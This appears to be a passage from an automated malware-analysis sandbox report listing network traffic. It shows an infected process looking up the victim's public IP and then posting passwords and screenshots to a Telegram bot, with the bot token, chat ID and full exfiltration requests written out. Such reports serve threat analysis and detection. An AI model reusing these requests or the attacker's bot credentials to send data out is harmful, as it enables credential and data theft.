                                                        Oct 30, 2024 16:26:59.947457075 CET50022443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:26:59.947488070 CET44350022149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:26:59.947613001 CET50022443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:26:59.947632074 CET44350022149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:00.474306107 CET44350022149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:00.474920034 CET50022443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:00.474980116 CET44350022149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:00.475044966 CET50022443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.123611927 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.123663902 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:09.123879910 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.127404928 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.127419949 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:09.959738016 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:09.961133003 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.961133003 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:09.961154938 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:09.961393118 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:09.963373899 CET50023443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:27:10.011362076 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:10.201042891 CET44350023149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:27:10.252953053 CET50023443192.168.2.4149.154.167.220

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 30, 2024 16:23:03.010938883 CET5625253192.168.2.41.1.1.1
                                                        Oct 30, 2024 16:23:03.018157959 CET53562521.1.1.1192.168.2.4
                                                        Oct 30, 2024 16:23:06.124845028 CET6143853192.168.2.41.1.1.1
                                                        Oct 30, 2024 16:23:06.132563114 CET53614381.1.1.1192.168.2.4
                                                        Oct 30, 2024 16:24:39.415992975 CET6353753192.168.2.41.1.1.1
                                                        Oct 30, 2024 16:24:39.423297882 CET53635371.1.1.1192.168.2.4
                                                        Oct 30, 2024 16:26:39.766613007 CET5276553192.168.2.41.1.1.1
                                                        Oct 30, 2024 16:26:39.775151968 CET53527651.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 30, 2024 16:23:03.010938883 CET192.168.2.41.1.1.10xa5e7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:23:06.124845028 CET192.168.2.41.1.1.10x5b99Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:24:39.415992975 CET192.168.2.41.1.1.10x4435Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:26:39.766613007 CET192.168.2.41.1.1.10xb5f3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 30, 2024 16:23:03.018157959 CET1.1.1.1192.168.2.40xa5e7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:23:03.018157959 CET1.1.1.1192.168.2.40xa5e7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:23:03.018157959 CET1.1.1.1192.168.2.40xa5e7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:23:06.132563114 CET1.1.1.1192.168.2.40x5b99No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:24:39.423297882 CET1.1.1.1192.168.2.40x4435No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 16:26:39.775151968 CET1.1.1.1192.168.2.40xb5f3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • api.ipify.org
                                                        • api.telegram.org

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449736104.26.12.2054431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:23:04 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:23:04 UTC211INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 15:23:04 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 14
                                                        Connection: close
                                                        Vary: Origin
                                                        cf-cache-status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8dac6787aff6e81b-DFW
                                                        2024-10-30 15:23:04 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
                                                        Data Ascii: 173.254.250.78


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449737149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:23:06 UTC260OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf8d5391f55d9
                                                        Host: api.telegram.org
                                                        Content-Length: 972
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:23:07 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:23:07 UTC972OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 38 64 35 33 39 31 66 35 35 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 38 64 35 33 39 31 66 35 35 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 33 30 2f 32 30 32 34 20 31 31 3a 32 33 3a 30 34 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dcf8d5391f55d9Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dcf8d5391f55d9Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/30/2024 11:23:04User
                                                        2024-10-30 15:23:07 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:23:07 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449958149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:24:40 UTC238OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd05b668e43bb1
                                                        Host: api.telegram.org
                                                        Content-Length: 76457
                                                        Expect: 100-continue
                                                        2024-10-30 15:24:40 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:24:40 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 62 36 36 38 65 34 33 62 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 62 36 36 38 65 34 33 62 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 31 35 2f 32 30 32 34 20 32 30 3a 33 35 3a 30 38 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd05b668e43bb1Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd05b668e43bb1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/15/2024 20:35:08User
                                                        2024-10-30 15:24:40 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:24:40 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:24:40 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:24:40 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:24:40 UTC10871OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:24:40 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 62 36 36 38 65 34 33 62 62 31 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd05b668e43bb1--
                                                        2024-10-30 15:24:41 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:24:41 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.450006149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:24:55 UTC238OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd104dbc64a525
                                                        Host: api.telegram.org
                                                        Content-Length: 76457
                                                        Expect: 100-continue
                                                        2024-10-30 15:24:56 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:24:56 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 34 64 62 63 36 34 61 35 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 34 64 62 63 36 34 61 35 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 39 2f 32 30 32 34 20 30 38 3a 30 33 3a 34 30 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd104dbc64a525Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd104dbc64a525Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/29/2024 08:03:40User
                                                        2024-10-30 15:24:56 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:24:56 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:24:56 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:24:56 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:24:56 UTC10871OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:24:56 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 34 64 62 63 36 34 61 35 32 35 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd104dbc64a525--
                                                        2024-10-30 15:24:56 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:24:56 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.450007149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:10 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd17130ddb0f75
